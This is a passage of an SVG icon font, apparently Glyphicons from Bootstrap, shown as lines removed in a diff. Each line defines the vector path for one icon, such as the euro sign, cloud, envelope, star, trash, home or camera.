-<glyph unicode="&#x20ac;" d="M100 500l100 100h113q0 47 5 100h-218l100 100h135q37 167 112 257q117 141 297 141q242 0 354 -189q60 -103 66 -209h-181q0 55 -25.5 99t-63.5 68t-75 36.5t-67 12.5q-24 0 -52.5 -10t-62.5 -32t-65.5 -67t-50.5 -107h379l-100 -100h-300q-6 -46 -6 -100h406l-100 -100 h-300q9 -74 33 -132t52.5 -91t62 -54.5t59 -29t46.5 -7.5q29 0 66 13t75 37t63.5 67.5t25.5 96.5h174q-31 -172 -128 -278q-107 -117 -274 -117q-205 0 -324 158q-36 46 -69 131.5t-45 205.5h-217z" />
-<glyph unicode="&#x2212;" d="M200 400h900v300h-900v-300z" />
-<glyph unicode="&#x2601;" d="M-14 494q0 -80 56.5 -137t135.5 -57h750q120 0 205 86t85 208q0 120 -85 206.5t-205 86.5q-46 0 -90 -14q-44 97 -134.5 156.5t-200.5 59.5q-152 0 -260 -107.5t-108 -260.5q0 -25 2 -37q-66 -14 -108.5 -67.5t-42.5 -122.5z" />
-<glyph unicode="&#x2709;" d="M0 100l400 400l200 -200l200 200l400 -400h-1200zM0 300v600l300 -300zM0 1100l600 -603l600 603h-1200zM900 600l300 300v-600z" />
-<glyph unicode="&#x270f;" d="M-13 -13l333 112l-223 223zM187 403l214 -214l614 614l-214 214zM887 1103l214 -214l99 92q13 13 13 32.5t-13 33.5l-153 153q-15 13 -33 13t-33 -13z" />
-<glyph unicode="&#xe000;" horiz-adv-x="500" d="M0 0z" />
-<glyph unicode="&#xe001;" d="M0 1200h1200l-500 -550v-550h300v-100h-800v100h300v550z" />
-<glyph unicode="&#xe002;" d="M14 84q18 -55 86 -75.5t147 5.5q65 21 109 69t44 90v606l600 155v-521q-64 16 -138 -7q-79 -26 -122.5 -83t-25.5 -111q17 -55 85.5 -75.5t147.5 4.5q70 23 111.5 63.5t41.5 95.5v881q0 10 -7 15.5t-17 2.5l-752 -193q-10 -3 -17 -12.5t-7 -19.5v-689q-64 17 -138 -7 q-79 -25 -122.5 -82t-25.5 -112z" />
-<glyph unicode="&#xe003;" d="M23 693q0 200 142 342t342 142t342 -142t142 -342q0 -142 -78 -261l300 -300q7 -8 7 -18t-7 -18l-109 -109q-8 -7 -18 -7t-18 7l-300 300q-119 -78 -261 -78q-200 0 -342 142t-142 342zM176 693q0 -136 97 -233t234 -97t233.5 96.5t96.5 233.5t-96.5 233.5t-233.5 96.5 t-234 -97t-97 -233z" />
-<glyph unicode="&#xe005;" d="M100 784q0 64 28 123t73 100.5t104.5 64t119 20.5t120 -38.5t104.5 -104.5q48 69 109.5 105t121.5 38t118.5 -20.5t102.5 -64t71 -100.5t27 -123q0 -57 -33.5 -117.5t-94 -124.5t-126.5 -127.5t-150 -152.5t-146 -174q-62 85 -145.5 174t-149.5 152.5t-126.5 127.5 t-94 124.5t-33.5 117.5z" />
-<glyph unicode="&#xe006;" d="M-72 800h479l146 400h2l146 -400h472l-382 -278l145 -449l-384 275l-382 -275l146 447zM168 71l2 1z" />
-<glyph unicode="&#xe007;" d="M-72 800h479l146 400h2l146 -400h472l-382 -278l145 -449l-384 275l-382 -275l146 447zM168 71l2 1zM237 700l196 -142l-73 -226l192 140l195 -141l-74 229l193 140h-235l-77 211l-78 -211h-239z" />
-<glyph unicode="&#xe008;" d="M0 0v143l400 257v100q-37 0 -68.5 74.5t-31.5 125.5v200q0 124 88 212t212 88t212 -88t88 -212v-200q0 -51 -31.5 -125.5t-68.5 -74.5v-100l400 -257v-143h-1200z" />
-<glyph unicode="&#xe009;" d="M0 0v1100h1200v-1100h-1200zM100 100h100v100h-100v-100zM100 300h100v100h-100v-100zM100 500h100v100h-100v-100zM100 700h100v100h-100v-100zM100 900h100v100h-100v-100zM300 100h600v400h-600v-400zM300 600h600v400h-600v-400zM1000 100h100v100h-100v-100z M1000 300h100v100h-100v-100zM1000 500h100v100h-100v-100zM1000 700h100v100h-100v-100zM1000 900h100v100h-100v-100z" />
-<glyph unicode="&#xe010;" d="M0 50v400q0 21 14.5 35.5t35.5 14.5h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5zM0 650v400q0 21 14.5 35.5t35.5 14.5h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400 q-21 0 -35.5 14.5t-14.5 35.5zM600 50v400q0 21 14.5 35.5t35.5 14.5h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5zM600 650v400q0 21 14.5 35.5t35.5 14.5h400q21 0 35.5 -14.5t14.5 -35.5v-400 q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5z" />
-<glyph unicode="&#xe011;" d="M0 50v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM0 450v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200 q-21 0 -35.5 14.5t-14.5 35.5zM0 850v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM400 50v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5 t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM400 450v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM400 850v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5 v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM800 50v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM800 450v200q0 21 14.5 35.5t35.5 14.5h200 q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM800 850v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5z" />
-<glyph unicode="&#xe012;" d="M0 50v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM0 450q0 -21 14.5 -35.5t35.5 -14.5h200q21 0 35.5 14.5t14.5 35.5v200q0 21 -14.5 35.5t-35.5 14.5h-200q-21 0 -35.5 -14.5 t-14.5 -35.5v-200zM0 850v200q0 21 14.5 35.5t35.5 14.5h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5zM400 50v200q0 21 14.5 35.5t35.5 14.5h700q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5 t-35.5 -14.5h-700q-21 0 -35.5 14.5t-14.5 35.5zM400 450v200q0 21 14.5 35.5t35.5 14.5h700q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-700q-21 0 -35.5 14.5t-14.5 35.5zM400 850v200q0 21 14.5 35.5t35.5 14.5h700q21 0 35.5 -14.5t14.5 -35.5 v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-700q-21 0 -35.5 14.5t-14.5 35.5z" />
-<glyph unicode="&#xe013;" d="M29 454l419 -420l818 820l-212 212l-607 -607l-206 207z" />
-<glyph unicode="&#xe014;" d="M106 318l282 282l-282 282l212 212l282 -282l282 282l212 -212l-282 -282l282 -282l-212 -212l-282 282l-282 -282z" />
-<glyph unicode="&#xe015;" d="M23 693q0 200 142 342t342 142t342 -142t142 -342q0 -142 -78 -261l300 -300q7 -8 7 -18t-7 -18l-109 -109q-8 -7 -18 -7t-18 7l-300 300q-119 -78 -261 -78q-200 0 -342 142t-142 342zM176 693q0 -136 97 -233t234 -97t233.5 96.5t96.5 233.5t-96.5 233.5t-233.5 96.5 t-234 -97t-97 -233zM300 600v200h100v100h200v-100h100v-200h-100v-100h-200v100h-100z" />
-<glyph unicode="&#xe016;" d="M23 694q0 200 142 342t342 142t342 -142t142 -342q0 -141 -78 -262l300 -299q7 -7 7 -18t-7 -18l-109 -109q-8 -8 -18 -8t-18 8l-300 299q-120 -77 -261 -77q-200 0 -342 142t-142 342zM176 694q0 -136 97 -233t234 -97t233.5 97t96.5 233t-96.5 233t-233.5 97t-234 -97 t-97 -233zM300 601h400v200h-400v-200z" />
-<glyph unicode="&#xe017;" d="M23 600q0 183 105 331t272 210v-166q-103 -55 -165 -155t-62 -220q0 -177 125 -302t302 -125t302 125t125 302q0 120 -62 220t-165 155v166q167 -62 272 -210t105 -331q0 -118 -45.5 -224.5t-123 -184t-184 -123t-224.5 -45.5t-224.5 45.5t-184 123t-123 184t-45.5 224.5 zM500 750q0 -21 14.5 -35.5t35.5 -14.5h100q21 0 35.5 14.5t14.5 35.5v400q0 21 -14.5 35.5t-35.5 14.5h-100q-21 0 -35.5 -14.5t-14.5 -35.5v-400z" />
-<glyph unicode="&#xe018;" d="M100 1h200v300h-200v-300zM400 1v500h200v-500h-200zM700 1v800h200v-800h-200zM1000 1v1200h200v-1200h-200z" />
-<glyph unicode="&#xe019;" d="M26 601q0 -33 6 -74l151 -38l2 -6q14 -49 38 -93l3 -5l-80 -134q45 -59 105 -105l133 81l5 -3q45 -26 94 -39l5 -2l38 -151q40 -5 74 -5q27 0 74 5l38 151l6 2q46 13 93 39l5 3l134 -81q56 44 104 105l-80 134l3 5q24 44 39 93l1 6l152 38q5 40 5 74q0 28 -5 73l-152 38 l-1 6q-16 51 -39 93l-3 5l80 134q-44 58 -104 105l-134 -81l-5 3q-45 25 -93 39l-6 1l-38 152q-40 5 -74 5q-27 0 -74 -5l-38 -152l-5 -1q-50 -14 -94 -39l-5 -3l-133 81q-59 -47 -105 -105l80 -134l-3 -5q-25 -47 -38 -93l-2 -6l-151 -38q-6 -48 -6 -73zM385 601 q0 88 63 151t152 63t152 -63t63 -151q0 -89 -63 -152t-152 -63t-152 63t-63 152z" />
-<glyph unicode="&#xe020;" d="M100 1025v50q0 10 7.5 17.5t17.5 7.5h275v100q0 41 29.5 70.5t70.5 29.5h300q41 0 70.5 -29.5t29.5 -70.5v-100h275q10 0 17.5 -7.5t7.5 -17.5v-50q0 -11 -7 -18t-18 -7h-1050q-11 0 -18 7t-7 18zM200 100v800h900v-800q0 -41 -29.5 -71t-70.5 -30h-700q-41 0 -70.5 30 t-29.5 71zM300 100h100v700h-100v-700zM500 100h100v700h-100v-700zM500 1100h300v100h-300v-100zM700 100h100v700h-100v-700zM900 100h100v700h-100v-700z" />
-<glyph unicode="&#xe021;" d="M1 601l656 644l644 -644h-200v-600h-300v400h-300v-400h-300v600h-200z" />
-<glyph unicode="&#xe022;" d="M100 25v1150q0 11 7 18t18 7h475v-500h400v-675q0 -11 -7 -18t-18 -7h-850q-11 0 -18 7t-7 18zM700 800v300l300 -300h-300z" />
-<glyph unicode="&#xe023;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -171 121.5 -292.5t292.5 -121.5t292.5 121.5t121.5 292.5t-121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM500 500v400h100 v-300h200v-100h-300z" />
-<glyph unicode="&#xe024;" d="M-100 0l431 1200h209l-21 -300h162l-20 300h208l431 -1200h-538l-41 400h-242l-40 -400h-539zM488 500h224l-27 300h-170z" />
-<glyph unicode="&#xe025;" d="M0 0v400h490l-290 300h200v500h300v-500h200l-290 -300h490v-400h-1100zM813 200h175v100h-175v-100z" />
-<glyph unicode="&#xe026;" d="M1 600q0 122 47.5 233t127.5 191t191 127.5t233 47.5t233 -47.5t191 -127.5t127.5 -191t47.5 -233t-47.5 -233t-127.5 -191t-191 -127.5t-233 -47.5t-233 47.5t-191 127.5t-127.5 191t-47.5 233zM188 600q0 -170 121 -291t291 -121t291 121t121 291t-121 291t-291 121 t-291 -121t-121 -291zM350 600h150v300h200v-300h150l-250 -300z" />
-<glyph unicode="&#xe027;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -171 121.5 -292.5t292.5 -121.5t292.5 121.5t121.5 292.5t-121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM350 600l250 300 l250 -300h-150v-300h-200v300h-150z" />
-<glyph unicode="&#xe028;" d="M0 25v475l200 700h800q199 -700 200 -700v-475q0 -11 -7 -18t-18 -7h-1150q-11 0 -18 7t-7 18zM200 500h200l50 -200h300l50 200h200l-97 500h-606z" />
-<glyph unicode="&#xe029;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -172 121.5 -293t292.5 -121t292.5 121t121.5 293q0 171 -121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM500 397v401 l297 -200z" />
-<glyph unicode="&#xe030;" d="M23 600q0 -118 45.5 -224.5t123 -184t184 -123t224.5 -45.5t224.5 45.5t184 123t123 184t45.5 224.5h-150q0 -177 -125 -302t-302 -125t-302 125t-125 302t125 302t302 125q136 0 246 -81l-146 -146h400v400l-145 -145q-157 122 -355 122q-118 0 -224.5 -45.5t-184 -123 t-123 -184t-45.5 -224.5z" />
-<glyph unicode="&#xe031;" d="M23 600q0 118 45.5 224.5t123 184t184 123t224.5 45.5q198 0 355 -122l145 145v-400h-400l147 147q-112 80 -247 80q-177 0 -302 -125t-125 -302h-150zM100 0v400h400l-147 -147q112 -80 247 -80q177 0 302 125t125 302h150q0 -118 -45.5 -224.5t-123 -184t-184 -123 t-224.5 -45.5q-198 0 -355 122z" />
-<glyph unicode="&#xe032;" d="M100 0h1100v1200h-1100v-1200zM200 100v900h900v-900h-900zM300 200v100h100v-100h-100zM300 400v100h100v-100h-100zM300 600v100h100v-100h-100zM300 800v100h100v-100h-100zM500 200h500v100h-500v-100zM500 400v100h500v-100h-500zM500 600v100h500v-100h-500z M500 800v100h500v-100h-500z" />
-<glyph unicode="&#xe033;" d="M0 100v600q0 41 29.5 70.5t70.5 29.5h100v200q0 82 59 141t141 59h300q82 0 141 -59t59 -141v-200h100q41 0 70.5 -29.5t29.5 -70.5v-600q0 -41 -29.5 -70.5t-70.5 -29.5h-900q-41 0 -70.5 29.5t-29.5 70.5zM400 800h300v150q0 21 -14.5 35.5t-35.5 14.5h-200 q-21 0 -35.5 -14.5t-14.5 -35.5v-150z" />
-<glyph unicode="&#xe034;" d="M100 0v1100h100v-1100h-100zM300 400q60 60 127.5 84t127.5 17.5t122 -23t119 -30t110 -11t103 42t91 120.5v500q-40 -81 -101.5 -115.5t-127.5 -29.5t-138 25t-139.5 40t-125.5 25t-103 -29.5t-65 -115.5v-500z" />
-<glyph unicode="&#xe035;" d="M0 275q0 -11 7 -18t18 -7h50q11 0 18 7t7 18v300q0 127 70.5 231.5t184.5 161.5t245 57t245 -57t184.5 -161.5t70.5 -231.5v-300q0 -11 7 -18t18 -7h50q11 0 18 7t7 18v300q0 116 -49.5 227t-131 192.5t-192.5 131t-227 49.5t-227 -49.5t-192.5 -131t-131 -192.5 t-49.5 -227v-300zM200 20v460q0 8 6 14t14 6h160q8 0 14 -6t6 -14v-460q0 -8 -6 -14t-14 -6h-160q-8 0 -14 6t-6 14zM800 20v460q0 8 6 14t14 6h160q8 0 14 -6t6 -14v-460q0 -8 -6 -14t-14 -6h-160q-8 0 -14 6t-6 14z" />
-<glyph unicode="&#xe036;" d="M0 400h300l300 -200v800l-300 -200h-300v-400zM688 459l141 141l-141 141l71 71l141 -141l141 141l71 -71l-141 -141l141 -141l-71 -71l-141 141l-141 -141z" />
-<glyph unicode="&#xe037;" d="M0 400h300l300 -200v800l-300 -200h-300v-400zM700 857l69 53q111 -135 111 -310q0 -169 -106 -302l-67 54q86 110 86 248q0 146 -93 257z" />
-<glyph unicode="&#xe038;" d="M0 401v400h300l300 200v-800l-300 200h-300zM702 858l69 53q111 -135 111 -310q0 -170 -106 -303l-67 55q86 110 86 248q0 145 -93 257zM889 951l7 -8q123 -151 123 -344q0 -189 -119 -339l-7 -8l81 -66l6 8q142 178 142 405q0 230 -144 408l-6 8z" />
-<glyph unicode="&#xe039;" d="M0 0h500v500h-200v100h-100v-100h-200v-500zM0 600h100v100h400v100h100v100h-100v300h-500v-600zM100 100v300h300v-300h-300zM100 800v300h300v-300h-300zM200 200v100h100v-100h-100zM200 900h100v100h-100v-100zM500 500v100h300v-300h200v-100h-100v-100h-200v100 h-100v100h100v200h-200zM600 0v100h100v-100h-100zM600 1000h100v-300h200v-300h300v200h-200v100h200v500h-600v-200zM800 800v300h300v-300h-300zM900 0v100h300v-100h-300zM900 900v100h100v-100h-100zM1100 200v100h100v-100h-100z" />
-<glyph unicode="&#xe040;" d="M0 200h100v1000h-100v-1000zM100 0v100h300v-100h-300zM200 200v1000h100v-1000h-100zM500 0v91h100v-91h-100zM500 200v1000h200v-1000h-200zM700 0v91h100v-91h-100zM800 200v1000h100v-1000h-100zM900 0v91h200v-91h-200zM1000 200v1000h200v-1000h-200z" />
-<glyph unicode="&#xe041;" d="M1 700v475q0 10 7.5 17.5t17.5 7.5h474l700 -700l-500 -500zM148 953q0 -42 29 -71q30 -30 71.5 -30t71.5 30q29 29 29 71t-29 71q-30 30 -71.5 30t-71.5 -30q-29 -29 -29 -71z" />
-<glyph unicode="&#xe042;" d="M2 700v475q0 11 7 18t18 7h474l700 -700l-500 -500zM148 953q0 -42 30 -71q29 -30 71 -30t71 30q30 29 30 71t-30 71q-29 30 -71 30t-71 -30q-30 -29 -30 -71zM701 1200h100l700 -700l-500 -500l-50 50l450 450z" />
-<glyph unicode="&#xe043;" d="M100 0v1025l175 175h925v-1000l-100 -100v1000h-750l-100 -100h750v-1000h-900z" />
-<glyph unicode="&#xe044;" d="M200 0l450 444l450 -443v1150q0 20 -14.5 35t-35.5 15h-800q-21 0 -35.5 -15t-14.5 -35v-1151z" />
-<glyph unicode="&#xe045;" d="M0 100v700h200l100 -200h600l100 200h200v-700h-200v200h-800v-200h-200zM253 829l40 -124h592l62 124l-94 346q-2 11 -10 18t-18 7h-450q-10 0 -18 -7t-10 -18zM281 24l38 152q2 10 11.5 17t19.5 7h500q10 0 19.5 -7t11.5 -17l38 -152q2 -10 -3.5 -17t-15.5 -7h-600 q-10 0 -15.5 7t-3.5 17z" />
-<glyph unicode="&#xe046;" d="M0 200q0 -41 29.5 -70.5t70.5 -29.5h1000q41 0 70.5 29.5t29.5 70.5v600q0 41 -29.5 70.5t-70.5 29.5h-150q-4 8 -11.5 21.5t-33 48t-53 61t-69 48t-83.5 21.5h-200q-41 0 -82 -20.5t-70 -50t-52 -59t-34 -50.5l-12 -20h-150q-41 0 -70.5 -29.5t-29.5 -70.5v-600z M356 500q0 100 72 172t172 72t172 -72t72 -172t-72 -172t-172 -72t-172 72t-72 172zM494 500q0 -44 31 -75t75 -31t75 31t31 75t-31 75t-75 31t-75 -31t-31 -75zM900 700v100h100v-100h-100z" />
-<glyph unicode="&#xe047;" d="M53 0h365v66q-41 0 -72 11t-49 38t1 71l92 234h391l82 -222q16 -45 -5.5 -88.5t-74.5 -43.5v-66h417v66q-34 1 -74 43q-18 19 -33 42t-21 37l-6 13l-385 998h-93l-399 -1006q-24 -48 -52 -75q-12 -12 -33 -25t-36 -20l-15 -7v-66zM416 521l178 457l46 -140l116 -317h-340 z" />
-<glyph unicode="&#xe048;" d="M100 0v89q41 7 70.5 32.5t29.5 65.5v827q0 28 -1 39.5t-5.5 26t-15.5 21t-29 14t-49 14.5v70h471q120 0 213 -88t93 -228q0 -55 -11.5 -101.5t-28 -74t-33.5 -47.5t-28 -28l-12 -7q8 -3 21.5 -9t48 -31.5t60.5 -58t47.5 -91.5t21.5 -129q0 -84 -59 -156.5t-142 -111 t-162 -38.5h-500zM400 200h161q89 0 153 48.5t64 132.5q0 90 -62.5 154.5t-156.5 64.5h-159v-400zM400 700h139q76 0 130 61.5t54 138.5q0 82 -84 130.5t-239 48.5v-379z" />
-<glyph unicode="&#xe049;" d="M200 0v57q77 7 134.5 40.5t65.5 80.5l173 849q10 56 -10 74t-91 37q-6 1 -10.5 2.5t-9.5 2.5v57h425l2 -57q-33 -8 -62 -25.5t-46 -37t-29.5 -38t-17.5 -30.5l-5 -12l-128 -825q-10 -52 14 -82t95 -36v-57h-500z" />
-<glyph unicode="&#xe050;" d="M-75 200h75v800h-75l125 167l125 -167h-75v-800h75l-125 -167zM300 900v300h150h700h150v-300h-50q0 29 -8 48.5t-18.5 30t-33.5 15t-39.5 5.5t-50.5 1h-200v-850l100 -50v-100h-400v100l100 50v850h-200q-34 0 -50.5 -1t-40 -5.5t-33.5 -15t-18.5 -30t-8.5 -48.5h-49z " />
-<glyph unicode="&#xe051;" d="M33 51l167 125v-75h800v75l167 -125l-167 -125v75h-800v-75zM100 901v300h150h700h150v-300h-50q0 29 -8 48.5t-18 30t-33.5 15t-40 5.5t-50.5 1h-200v-650l100 -50v-100h-400v100l100 50v650h-200q-34 0 -50.5 -1t-39.5 -5.5t-33.5 -15t-18.5 -30t-8 -48.5h-50z" />
-<glyph unicode="&#xe052;" d="M0 50q0 -20 14.5 -35t35.5 -15h1100q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-1100q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM0 350q0 -20 14.5 -35t35.5 -15h800q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-800q-21 0 -35.5 -14.5t-14.5 -35.5 v-100zM0 650q0 -20 14.5 -35t35.5 -15h1000q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-1000q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM0 950q0 -20 14.5 -35t35.5 -15h600q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-600q-21 0 -35.5 -14.5 t-14.5 -35.5v-100z" />
-<glyph unicode="&#xe053;" d="M0 50q0 -20 14.5 -35t35.5 -15h1100q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-1100q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM0 650q0 -20 14.5 -35t35.5 -15h1100q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-1100q-21 0 -35.5 -14.5t-14.5 -35.5 v-100zM200 350q0 -20 14.5 -35t35.5 -15h700q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-700q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM200 950q0 -20 14.5 -35t35.5 -15h700q21 0 35.5 15t14.5 35v100q0 21 -14.5 35.5t-35.5 14.5h-700q-21 0 -35.5 -14.5 t-14.5 -35.5v-100z" />
-<glyph unicode="&#xe054;" d="M0 50v100q0 21 14.5 35.5t35.5 14.5h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-1100q-21 0 -35.5 15t-14.5 35zM100 650v100q0 21 14.5 35.5t35.5 14.5h1000q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-1000q-21 0 -35.5 15 t-14.5 35zM300 350v100q0 21 14.5 35.5t35.5 14.5h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-800q-21 0 -35.5 15t-14.5 35zM500 950v100q0 21 14.5 35.5t35.5 14.5h600q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-600 q-21 0 -35.5 15t-14.5 35z" />
-<glyph unicode="&#xe055;" d="M0 50v100q0 21 14.5 35.5t35.5 14.5h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-1100q-21 0 -35.5 15t-14.5 35zM0 350v100q0 21 14.5 35.5t35.5 14.5h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-1100q-21 0 -35.5 15 t-14.5 35zM0 650v100q0 21 14.5 35.5t35.5 14.5h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-1100q-21 0 -35.5 15t-14.5 35zM0 950v100q0 21 14.5 35.5t35.5 14.5h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-1100 q-21 0 -35.5 15t-14.5 35z" />
-<glyph unicode="&#xe056;" d="M0 50v100q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-100q-21 0 -35.5 15t-14.5 35zM0 350v100q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-100q-21 0 -35.5 15 t-14.5 35zM0 650v100q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-100q-21 0 -35.5 15t-14.5 35zM0 950v100q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-100q-21 0 -35.5 15 t-14.5 35zM300 50v100q0 21 14.5 35.5t35.5 14.5h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-800q-21 0 -35.5 15t-14.5 35zM300 350v100q0 21 14.5 35.5t35.5 14.5h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-800 q-21 0 -35.5 15t-14.5 35zM300 650v100q0 21 14.5 35.5t35.5 14.5h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15h-800q-21 0 -35.5 15t-14.5 35zM300 950v100q0 21 14.5 35.5t35.5 14.5h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -20 -14.5 -35t-35.5 -15 h-800q-21 0 -35.5 15t-14.5 35z" />
-<glyph unicode="&#xe057;" d="M-101 500v100h201v75l166 -125l-166 -125v75h-201zM300 0h100v1100h-100v-1100zM500 50q0 -20 14.5 -35t35.5 -15h600q20 0 35 15t15 35v100q0 21 -15 35.5t-35 14.5h-600q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM500 350q0 -20 14.5 -35t35.5 -15h300q20 0 35 15t15 35 v100q0 21 -15 35.5t-35 14.5h-300q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM500 650q0 -20 14.5 -35t35.5 -15h500q20 0 35 15t15 35v100q0 21 -15 35.5t-35 14.5h-500q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM500 950q0 -20 14.5 -35t35.5 -15h100q20 0 35 15t15 35v100 q0 21 -15 35.5t-35 14.5h-100q-21 0 -35.5 -14.5t-14.5 -35.5v-100z" />
-<glyph unicode="&#xe058;" d="M1 50q0 -20 14.5 -35t35.5 -15h600q20 0 35 15t15 35v100q0 21 -15 35.5t-35 14.5h-600q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM1 350q0 -20 14.5 -35t35.5 -15h300q20 0 35 15t15 35v100q0 21 -15 35.5t-35 14.5h-300q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM1 650 q0 -20 14.5 -35t35.5 -15h500q20 0 35 15t15 35v100q0 21 -15 35.5t-35 14.5h-500q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM1 950q0 -20 14.5 -35t35.5 -15h100q20 0 35 15t15 35v100q0 21 -15 35.5t-35 14.5h-100q-21 0 -35.5 -14.5t-14.5 -35.5v-100zM801 0v1100h100v-1100 h-100zM934 550l167 -125v75h200v100h-200v75z" />
-<glyph unicode="&#xe059;" d="M0 275v650q0 31 22 53t53 22h750q31 0 53 -22t22 -53v-650q0 -31 -22 -53t-53 -22h-750q-31 0 -53 22t-22 53zM900 600l300 300v-600z" />
-<glyph unicode="&#xe060;" d="M0 44v1012q0 18 13 31t31 13h1112q19 0 31.5 -13t12.5 -31v-1012q0 -18 -12.5 -31t-31.5 -13h-1112q-18 0 -31 13t-13 31zM100 263l247 182l298 -131l-74 156l293 318l236 -288v500h-1000v-737zM208 750q0 56 39 95t95 39t95 -39t39 -95t-39 -95t-95 -39t-95 39t-39 95z " />
-<glyph unicode="&#xe062;" d="M148 745q0 124 60.5 231.5t165 172t226.5 64.5q123 0 227 -63t164.5 -169.5t60.5 -229.5t-73 -272q-73 -114 -166.5 -237t-150.5 -189l-57 -66q-10 9 -27 26t-66.5 70.5t-96 109t-104 135.5t-100.5 155q-63 139 -63 262zM342 772q0 -107 75.5 -182.5t181.5 -75.5 q107 0 182.5 75.5t75.5 182.5t-75.5 182t-182.5 75t-182 -75.5t-75 -181.5z" />
